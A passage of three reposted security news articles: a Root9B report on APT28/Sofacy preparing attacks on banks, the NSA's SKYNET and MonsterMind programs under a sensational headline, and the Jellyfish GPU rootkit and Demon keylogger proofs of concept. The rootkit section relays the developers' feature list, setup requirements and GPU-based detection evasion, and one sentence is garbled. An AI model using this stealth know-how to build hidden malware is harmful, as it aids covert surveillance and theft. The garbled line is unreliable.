The Root9B analysts came across a phishing domain at the end of April that was similar to that of a Middle Eastern financial institution, according to a report published Tuesday. When they dug deeper they uncovered new Sofacy malware samples and servers and domains that were being set up by the group for an upcoming operation.

Based on the information gathered so far, Root9B believes the group’s planned targets include Commercial Bank International in the UAE, Bank of America, TD Canada Trust, the United Nations Children’s Fund (UNICEF), United Bank for Africa, Regions Bank, and possibly Commerzbank.

The company has alerted the financial institutions, as well as international and U.S. authorities. It’s not clear if the attacks have started yet, but the Root9B analysts believe that when they do, they will likely include spear-phishing.

The company released hashes for the new malware samples it has identified and the IP address of a command-and-control server set up by the attackers, so that companies can block them on their networks.

Based on the evidence they’ve seen, the Root9B analysts believe that there might be two subgroups within APT28: One that targets military and government organizations and one that targets financial institutions and banks.

Of course, the attackers might now decide to delay the operation in order to change their infrastructure and targets. So, financial institutions should remain vigilant and should examine all email messages for possible spear-phishing attempts.

 

 

 

By Lucian Constantin

 

 

Skynet actually exists!!! Skynet is a top secret program of NSA

National Security Agency (NSA) actually has a real program named Skynet

Skynet, which was an evil military computer system that launches war on human race in the Terminator movies franchise, it is learnt that NSA has a program with the same name.

As per The Intercept reports, the NSA does have a program called Skynet. However, it has a less lethal but legally dubious aims. This one is a surveillance program that makes use of phone metadata to record the call activities and location of doubtful terrorists. An Al Jazeera journalist reportedly became one of its victims after he was kept on a terrorist watch list.

Chief bureau of Al Jazeera’s Islamabad office, Ahmad Muaffaq Zaidan got traced by Skynet after he was recognized by US intelligence as a possible Al Qaeda member and given a watch list number. Zaidan, a Syrian national has taken a number of exclusive interviews with senior Al Qaeda leaders, including Osama bin Laden himself.

According to a 2012 government presentation The Intercept obtained from Edward Snowden says that Skynet makes use of phone location and call metadata from bulk phone call records to identify fishy patterns in their communication habits and physical movements of the suspects.

Says Wired:

The presentation indicates that SKYNET looks for terrorist connections based on questions such as “who has traveled from Peshawar to Faisalabad or Lahore (and back) in the past month? Who does the traveler call when he arrives?” It also looks for suspicious behaviors such as someone who engages in “excessive SIM or handset swapping” or receives “incoming calls only.” The goal is to identify people who move around in a pattern similar to Al Qaeda couriers who are used to pass communication and intelligence between the group’s senior leaders.

In addition to its misleading name, SKYNET has a few problems though. It happened to misidentify an Al-Jazeera reporter as a member of al-Qaida based on the criteria mentioned above. (It seems that the journalists meeting with sources and terrorists meeting with terrorist group leaders move in patterns that look same to the computer.) This misidentification would be disturbing even if the government did not make use of such metadata to make life-and-death decisions about who to kill with drone strikes. However, it does.

The NSA one should note has a second program too that is very similar to the Terminator‘s Skynet. As revealed by Edward Snowden in an interview with WIRED and James Bamford last year, this one is called MonsterMind. Like the film version of Skynet, MonsterMind is a defense surveillance system that would immediately and independently disarm foreign cyberattacks against the US, and could be used to launch retaliatory strikes as well. Algorithms under this program would remove massive repositories of metadata and examine it to recognize normal network traffic from anomalous or malicious traffic. Equipped with this knowledge, the NSA could immediately and autonomously find, and block, a foreign threat.

Snowden also stated that MonsterMind could one day be designed to automatically return fire without human interference against an attacker. Because an attacker could twist malicious code to keep away from detection, a counterstrike would be more successful in neutralizing future attacks. Sounds a lot like Skynet. However, there is no news from the NSA on why the iconic film name was not used for its real-world Skynet.

 

If you asked me, it seems quite serious guys who adhesives in the program:

Arnold Schwarzenegger, who later became governor of California.

 

 

 

Credit:  Kavita Iyer

New GPU-based Linux Rootkit and Keylogger | Proof-of-concept GPU rootkit hides in VRAM, snoops system activities

 

A team of coders have published a new “educational” rootkit, dubbed Jellyfish, that’s virtually undetectable by current software practices. Their work is designed to demonstrate that GPUs, which have become considerably more powerful and flexible over the past decade, are now capable of running keyloggers and rootkits.

The world of hacking has become more organized and reliable over recent years and so the techniques of hackers.
Nowadays, attackers use highly sophisticated tactics and often go to extraordinary lengths in order to mount an attack.
And there is something new to the list:
A team of developers has created not one, but two pieces of malware that run on an infected computer’s graphics processor unit (GPU) instead of its central processor unit (CPU), in order to enhance their stealthiness and computational efficiency.

The two pieces of malware:

The source code of both the Jellyfish Rootkit and the Demon keylogger, which are described as proof-of-concepts malware, have been published on Github.
Until now, security researchers have discovered nasty malware running on the CPU and exploiting the GPU capabilities in an attempt to mine cryptocurrencies such as Bitcoins.
However, these two malware could operate without exploiting or modifying the processes in the operating system kernel, and this is why they do not trigger any suspicion that a system is infected and remain hidden.

 

JELLYFISH ROOTKIT

Jellyfish is capable of running on Nvidia, AMD, and Intel hardware (this last thanks to support from AMD’s APP SDK). The advantage of using a GPU to perform system snooping and keylogging is substantial. If you stop and think about it, there are a variety of methods to determine exactly what is running on your CPU. From the Windows Task Manager to applications like Process Explorer, there are built-in or free tools that will help you isolate exactly which processes are being called and what those processes are doing. Malware detection software is more complex, but it offers an even deeper window into process analysis.

Contrast that with GPUs. In terms of freeware utilities, you’ve got GPU-Z and a handful of other applications that provide a similar “GPU Load” monitoring function. Nvidia, AMD, and Intel all provide some basic profiling tools that can be used to analyze a GPU’s performance in a specific application, but these toolkits plug into existing software packages, like Visual Studio. They don’t take a snapshot of what’s running on the GPU in general — they allow you to monitor code that you’ve explicitly told to run on the GPU.

GPU-malware

Hackers and researchers have been exploring more of what a GPU can be used for and come away with some interesting results, including a project last year that turned a graphics card into a keylogger. As they noted at the time, “By instructing the GPU to carefully monitor via DMA the physical page where the keyboard buffer resides, a GPU-based keylogger can record all user keystrokes and store them in the memory space of the GPU.”

For those of you wondering about using a simple GPU load monitor to catch this work, it’s not really feasible — the estimated CPU and GPU utilization was ~0.1%. The Jellyfish rootkit discussed above doesn’t just have the ability to transmit information back across a network — it can theoretically remain resident in between warm reboots of the target system.

 

New GPU-based Linux Rootkit and Keylogger with Excellent Stealth and Computing Power

 

Jellyfish rootkit is a proof-of-concept malware code designed to show that running malware on GPUs is practically possible, as dedicated graphics cards have their processors and memory.
These types of rootkits could snoop on the CPU host memory through DMA (direct memory access), which allows hardware components to read the main system memory without going through the CPU, making such actions harder to detect.

The pseudo-anonymous developers describe their Jellyfish Rootkit as:

Jellyfish is a Linux based userland gpu rootkit proof of concept project utilizing the LD_PRELOAD technique from Jynx (CPU), as well as the OpenCL API developed by Khronos group (GPU). Code currently supports AMD and NVIDIA graphics cards. However, the AMDAPPSDK does support Intel as well.

Advantages of GPU stored memory:

  • No GPU malware analysis tools are available on the Internet
  • Can snoop on CPU host memory via DMA (direct memory access)
  • GPU can be used for fast/swift mathematical calculations like parsing or XORing
  • Stubs
  • Malicious memory is still inside GPU after device shutdown

Requirements for use:

  • Have OpenCL drivers/icds installed
  • Nvidia or AMD graphics card (Intel supports AMD’s SDK)
  • Change line 103 in rootkit/kit.c to server ip you want to monitor GPU client from

Stay tuned for more features:

  • client listener; let buffers stay stored in GPU until you send a magic packet from the server
The anonymous developers of the rootkit warned people that Jellyfish is a proof-of-concept malware and still a work in progress so that it can contain flaws. The code published on Github is intended to be used for educational purposes only.

 

DEMON KEYLOGGER

Moreover, the developers also built a separate, GPU-based keylogger, dubbed Demon though they did not provide any technical details about the tool.
Demon keylogger is also a proof-of-concept that is inspired by the malware described in a 2013 academic research paper [PDF] titled “You Can Type, but You Can’t Hide: A Stealthy GPU-based Keylogger,” but the developers stressed that they were not working with the researchers.
We are not associated with the creators of this paper,” the Demon developers said. “We only PoC’d what was described in it, plus a little more.
As described in the research paper, GPU-based keystroke logger consists of two main components:
  • A CPU-based component that is executed once, during the bootstrap phase, with the task of locating the address of the keyboard buffer in main memory.
  • A GPU-based component that monitors, via DMA, the keyboard buffer, and records all keystroke events.
However, users may not worry about cyber criminals or hackers using GPU-based malware yet, but proof-of-concepts malware such as Jellyfish Rootkit and Demon keylogger could inspire future developments.

 

How do we fix this?

It seems likely that malware detection methods will have to evolve to scan the GPU as well as the CPU, but it’s not clear how easy that’s going to be. The keylogger research team noted that Nvidia’s CUDA environment did offer the ability to attach to a running process and monitor its actions, but states that this is currently Nvidia-specific and of only limited (though important) use.

Software detection methods are going to need to fundamentally step up their game. Malware researchers tend to use virtual machines (for all the reasons you’d imagine), but these applications are not designed to support GPU API virtualization. That’s going to need to change if we’re going to protect systems from code running on GPUs.

Given the fact that code running on the GPU is almost untraceable today, it wouldn’t surprise me in the slightest to discover that state governments had already exploited these detection weaknesses. White hats, start your engines. Jellyfish is a Linux utility for now, but nothing in the literature suggests that this issue is unique to that operating system.

 

 

 

Credit: extremetech